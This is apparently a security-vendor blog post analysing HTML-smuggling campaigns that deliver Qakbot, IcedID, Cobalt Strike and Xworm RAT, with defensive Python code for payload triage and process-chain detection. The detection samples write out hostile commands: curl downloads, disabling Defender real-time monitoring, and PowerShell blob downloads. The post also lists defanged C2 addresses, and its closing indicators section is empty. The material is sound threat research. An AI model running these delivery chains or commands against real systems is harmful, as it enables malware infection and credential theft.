HTML Smuggling: The Hidden Threat in Your Inbox

Last October, Trustwave SpiderLabs blogged about the use and prevalence of HTML email attachments to deliver malware and phish for credentials. HTML smuggling has since become more prevalent, and we have seen various cybercriminal groups using these techniques to distribute malware.

HTML smuggling relies on HTML5 and JavaScript features that work offline: the binary is stored inside the JavaScript code as an immutable blob of data, and when the HTML is opened in a web browser that data blob, the embedded payload, is decoded into a file object. Threat actors take advantage of the versatility of HTML, combined with social engineering, to lure the user into saving and opening the malicious payload.

HTML smuggling is not new, but it has gained popularity, especially after Microsoft started blocking macros in documents from the Internet by default. What has not changed is the use of HTML smuggling to deliver the initial payload; the intermediate payload varies between ISO, IMG, and VHD disk image files.

The latest campaigns impersonate well-known brands like Adobe Acrobat, Google Drive, and Dropbox to increase the chances of users opening the archives.

In this blog, we will cover some notable malware strains that have utilized HTML smuggling in their infection chain and provide a brief analysis of each malware.

Qakbot

Qakbot, one of the most notorious malware families actively distributed through spam, has been using HTML smuggling since June 2022. It shifted from macro documents to HTML attachments as Microsoft pushed restrictions on the use of macros in documents from the Internet.


Figure 1: Qakbot is delivered via HTML attachments as seen in our spam traps.

A Qakbot email campaign from September 2022 uses a plain template and does not impersonate well-known brands. Instead, the email tricks the user into clicking the HTML attachment, which causes an encrypted ZIP archive to be saved to disk. Both the email and the HTML attachment contain the password needed to extract the ZIP content.


Figure 2: Spam email delivering Qakbot via an HTML attachment


Figure 3: HTML smuggling template

Looking at the HTML source code, the functions and methods used to assemble the payload are obfuscated into arrays, an attempt to conceal suspicious commands and evade email gateway filters. The technique abuses the msSaveOrOpenBlob JavaScript method (navigator.msSaveOrOpenBlob) to generate the malicious payload dynamically and drop it to disk.


Figure 4: Obfuscated JavaScript code used for payload smuggling
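As an added example (not code from the post), a gateway-side triage routine for HTML attachments: it flags the JavaScript APIs smuggling pages depend on, reassembles a payload split across an array of string chunks (the array obfuscation described above), decodes it, and names the intermediate file from its magic bytes. The lure it inspects is constructed inline, and the API list and chunk-array pattern are assumptions about common variants rather than anything shown in the post.

```python
import base64
import io
import re
import zipfile

# JavaScript APIs a smuggling page needs to turn an embedded string into a file
# the browser saves (msSaveOrOpenBlob is named in the post; the rest are assumed).
SMUGGLING_APIS = ("msSaveOrOpenBlob", "new Blob", "createObjectURL", "atob(", 'download="')
B64_LITERAL = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# Payload split into an array of quoted chunks that the script joins at run time.
CHUNK_ARRAY = re.compile(r'\[\s*(?:"[A-Za-z0-9+/=]*"\s*,?\s*){2,}\]')

def identify(data: bytes) -> str:
    """Name a decoded intermediate payload from its magic bytes."""
    if data.startswith(b"PK\x03\x04"):
        return "ZIP archive"
    if data.startswith(b"MZ"):
        return "PE executable/DLL"
    if len(data) > 0x8006 and data[0x8001:0x8006] == b"CD001":
        return "ISO 9660 image"
    if data[:8] == b"conectix" or data[-512:-504] == b"conectix":
        return "VHD image"
    return "unknown"

def triage_html(html: str) -> dict:
    """Report suspicious APIs and every decodable embedded payload as (size, type)."""
    apis = [a for a in SMUGGLING_APIS if a in html]
    candidates = ["".join(re.findall(r'"([^"]*)"', m.group(0)))
                  for m in CHUNK_ARRAY.finditer(html)]
    candidates += B64_LITERAL.findall(CHUNK_ARRAY.sub("", html))
    payloads = []
    for c in candidates:
        try:
            data = base64.b64decode(c, validate=True)
        except ValueError:  # not base64 after all (binascii.Error is a ValueError)
            continue
        payloads.append((len(data), identify(data)))
    return {"apis": apis, "payloads": payloads}

def build_sample() -> str:
    """Constructed lure: a ZIP holding a placeholder file, base64 split into chunks."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("invoice.lnk", "placeholder text, not a real shortcut")
    b64 = base64.b64encode(buf.getvalue()).decode()
    chunks = ",".join(f'"{b64[i:i + 32]}"' for i in range(0, len(b64), 32))
    return ("<html><script>var p=[" + chunks + '].join("");'
            "var b=new Blob([Uint8Array.from(atob(p),c=>c.charCodeAt(0))]);"
            'navigator.msSaveOrOpenBlob(b,"invoice.zip");</script></html>')
```

Running `triage_html(build_sample())` reports the three APIs present and one decoded payload identified as a ZIP archive; the same magic checks apply to the base64 text files the Xworm chain below decodes into DLLs.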


Figure 5: ZIP archive drop containing a Windows Shortcut LNK

The dropped ZIP archive contains a single file, a Windows Shortcut (LNK). Once the user extracts the archive and launches the LNK file, it invokes the Windows Command Processor, which creates a download folder inside the %LOCALAPPDATA% directory and then downloads and executes a JavaScript file using the built-in curl tool and WScript, respectively. The JavaScript file downloads the main payload, a Qakbot DLL. The payload is loaded with rundll32 and then injected into explorer.exe through process hollowing.


Figure 6: Infection chain of the Qakbot campaign


Figure 7: Qakbot campaign impersonating Google Drive

IcedID

Another infamous malware strain, IcedID, also known as BokBot, has been observed using HTML smuggling. There is some overlap in the delivery method between IcedID and Qakbot, as the HTML templates we saw were nearly identical.


Figure 8: Thread-hijacked email delivering IcedID


Figure 9: HTML template spoofing a PDF viewer to lure targets to install IcedID

In this sample, IcedID was delivered through a thread-hijacked email with an HTML attachment. A thread-hijacked email is a legitimate email conversation into which threat actors have inserted malicious messages, links, or attachments. After loading in the browser, the HTML, impersonating a PDF document viewer, drops a password-protected ZIP archive containing an ISO disk image file. The HTML template contains the archive’s password. Inside the ISO file are an LNK file, a decoy PNG image, and the IcedID DLL. Clicking the LNK file launches a command line that opens the decoy PNG image while, in the background, rundll32 loads the initial IcedID DLL with the PluginInit parameter.


Figure 10: Command line to load decoy PNG image


Figure 11: Infection chain of IcedID campaign

Since 2017, IcedID has implemented a range of delivery methods favoring email as its initial access vector. It started as a banking trojan targeting financial institutions but has since evolved into a dropper of additional malware payloads, like ransomware, and has become an initial access provider for other threat actors seeking to establish a foothold on a target system.

Cobalt Strike

More recently, in December, we came across a spam email with an HTML attachment dropping Cobalt Strike. The HTML lure looks similar to those of the Qakbot and IcedID campaigns.


Figure 12: Infection chain of Cobalt Strike delivery through email with an HTML attachment


Figure 13: PDF viewer-themed HTML lure delivering Cobalt Strike


Figure 14: ISO package containing LNK shortcut, PowerShell scripts including Cobalt Strike, and a decoy document

When the HTML is loaded, it drops an ISO file containing an LNK file that, when clicked, launches the payload execution sequence. The LNK file starts PowerShell to execute a PowerShell script disguised with a ‘.log’ extension rather than ‘.ps1’. Changing the extension is an attempt to evade defenses and to trick the user into thinking the file is an ordinary log file.


Figure 15: PowerShell script

The initial PowerShell script lays the groundwork for the successful execution of the Cobalt Strike payload. The script first checks whether the target system is part of a domain. If it is, the script disables Microsoft Defender’s real-time monitoring and then creates an LNK shortcut in the Startup folder pointing to the Cobalt Strike payload, as a form of persistence. Otherwise, it loads the decoy PDF document and terminates the sequence.

To conceal the malicious activity the script loads the decoy PDF document before launching the main payload.


Figure 16: First stage PS1 script disabling antivirus, checking the system configuration, and setting up persistence

The initial and main PowerShell scripts obfuscate their variables and functions only by giving them random, lengthy names. For the sake of readability, we have shortened the variable names in the figures.


Figure 17: Cobalt Strike with base64-encoded shellcode

Before memory injection, the Cobalt Strike shellcode is decoded from base64 and then XORed with the single-byte key 35. It connects to its C2 server at hxxp[://]165[.]22[.]48[.]183/common?chunk=false.

Xworm RAT

One of the more interesting samples we uncovered in our spam traps is an Xworm RAT, a .NET-compiled malware capable of monitoring user activity, including keystrokes and screen content.


Figure 18: Email campaign delivering the Xworm RAT

The email purports to be from the U.S. Postal System, with the subject line reading “Your shipment is out for delivery”, and includes an HTML file attachment. When the recipient opens the HTML, it loads in the browser and automatically drops an ISO disk image onto the target system.

The ISO file contains a Visual Basic Script (VBS) file. The user must open the ISO file for it to be mounted and then double-click the VBS file for the infection chain to continue.

When executed, the VBScript code launches PowerShell commands to retrieve two encoded blobs. Below is the final PowerShell command launched:


Figure 19: Final PowerShell command launch

The first blob is retrieved from hxxp://5[.]42[.]199[.]235/dll/dll2.txt, and the PowerShell script decodes the base64-encoded blob into a DLL file. This first DLL has the following capabilities:

  • Creates a copy of the VBS file in the Startup folder
  • Sets the VBS persistence through a scheduled task
  • Downloads the stager DLL which will serve as the loader of the second blob or the main payload

The second blob is downloaded from hxxps://beautiful-elion[.]68-64-160-26[.]plesk[.]page/weslle.txt. Like the first blob, the base64-encoded file is converted into a DLL. We found that this main payload is an Xworm RAT.

The code shown below is from the first DLL; the highlighted method, “PUlGKA”, is the one invoked through the VBScript command. It downloads and decodes the stager DLL from hxxp://5[.]42[.]199[.]235/pe/Pe.txt. From there, the stager manages the execution of the Xworm DLL through the built-in Windows command RegAsm.


Figure 20: PUlGKA method


Figure 21: Attack sequence of a campaign that starts from email then ends with Xworm RAT dropped.
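To tie the chains together from the defender’s side, here is an added example (not from the post) that runs a handful of parent/child/command-line rules modelled on the Qakbot, IcedID, Cobalt Strike, and Xworm sequences above over constructed process-creation events. The Set-MpPreference cmdlet is an assumption about how the stager disables Defender real-time monitoring, the example.invalid hosts are placeholders, and the file names reused from the post are only labels in the sample data.

```python
import re

# Each rule is a name plus a regex matched against the lower-cased string
# "parent_image|image|cmdline" of one process-creation event. Chains follow the
# post; Set-MpPreference is an assumption (the post does not show the command).
RULES = [
    ("qakbot_lnk_cmd_curl_wscript", r"explorer\.exe\|cmd\.exe\|.*curl.*localappdata.*wscript"),
    ("qakbot_wscript_rundll32_localappdata", r"wscript\.exe\|rundll32\.exe\|.*appdata\\local"),
    ("icedid_rundll32_plugininit", r"\|rundll32\.exe\|.*plugininit"),
    ("cobaltstrike_powershell_runs_log_file",
     r"\|powershell\.exe\|(?=.*\.log\b)(?=.*(iex|invoke-expression))"),
    ("defender_realtime_monitoring_disabled",
     r"\|powershell\.exe\|.*set-mppreference.*-disablerealtimemonitoring"),
    ("xworm_wscript_powershell_blob_download",
     r"wscript\.exe\|powershell\.exe\|(?=.*downloadstring)(?=.*frombase64string)"),
]

def detect(events):
    """Return [(rule_name, pid)] for every event whose chain matches a rule."""
    image = {e["pid"]: e["image"] for e in events}
    hits = []
    for e in events:
        chain = f"{image.get(e['ppid'], '')}|{e['image']}|{e['cmdline']}".lower()
        hits += [(name, e["pid"]) for name, rx in RULES if re.search(rx, chain)]
    return hits

# Constructed process-creation events modelled on the chains in the post
# (example.invalid hosts; file names from the post are reused only as labels).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 101, "ppid": 100, "image": "cmd.exe", "cmdline":
     'cmd.exe /c mkdir "%LOCALAPPDATA%\\dl" & curl -o "%LOCALAPPDATA%\\dl\\a.js" '
     'http://example.invalid/a & wscript "%LOCALAPPDATA%\\dl\\a.js"'},
    {"pid": 102, "ppid": 101, "image": "wscript.exe",
     "cmdline": 'wscript.exe "C:\\Users\\u\\AppData\\Local\\dl\\a.js"'},
    {"pid": 103, "ppid": 102, "image": "rundll32.exe",
     "cmdline": "rundll32.exe C:\\Users\\u\\AppData\\Local\\dl\\x.tmp,#1"},
    {"pid": 110, "ppid": 100, "image": "rundll32.exe",
     "cmdline": "rundll32.exe D:\\0e7132bf-c75b-4ff9-ab6a-0db25f7250a4.W6_,PluginInit"},
    {"pid": 120, "ppid": 100, "image": "powershell.exe",
     "cmdline": 'powershell.exe -w hidden -c "iex (gc .\\bbftullzytwpbp.log -Raw)"'},
    {"pid": 121, "ppid": 120, "image": "powershell.exe",
     "cmdline": "powershell.exe -c Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"pid": 130, "ppid": 100, "image": "wscript.exe", "cmdline": "wscript.exe E:\\track.vbs"},
    {"pid": 131, "ppid": 130, "image": "powershell.exe", "cmdline":
     "powershell.exe -c $b=(New-Object Net.WebClient).DownloadString('http://example.invalid/dll/dll2.txt');[Convert]::FromBase64String($b)"},
    {"pid": 140, "ppid": 100, "image": "powershell.exe", "cmdline": "powershell.exe -c Get-Content app.log"},
]
```

`detect(SAMPLE_EVENTS)` fires once per stage of each chain (pids 101, 103, 110, 120, 121 and 131) and stays silent on the benign `Get-Content app.log` invocation, which shares the `.log` argument but not the in-memory execution.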


The shift in malware delivery methods toward HTML is concerning, as it challenges email gateway scanners, endpoint protection, and other security solutions, especially their ability to unpack, decode, and detect such techniques. With HTML smuggling, the malware is concealed from scanners: most AV engines see only the HTML attachment, whereas an ISO file attached directly would immediately raise red flags. Combining HTML smuggling with archives and disk images as intermediate payloads raises the chances of delivering malware and gaining initial access. Threat actors are crafty in their lures, mixing various social engineering techniques and exploring different attack chains to gain a foothold on the target’s system.

We expect to see more sophisticated malware delivered through HTML smuggling: more compelling lures impersonating well-known products and social engineering tricks, more complex obfuscation at the HTML level to evade signature-based detection, and diverse attack sequences that may require more user interaction yet still succeed in gaining initial access.

We always remind everyone to stay vigilant in this ever-changing digital landscape. 


Indicators of Compromise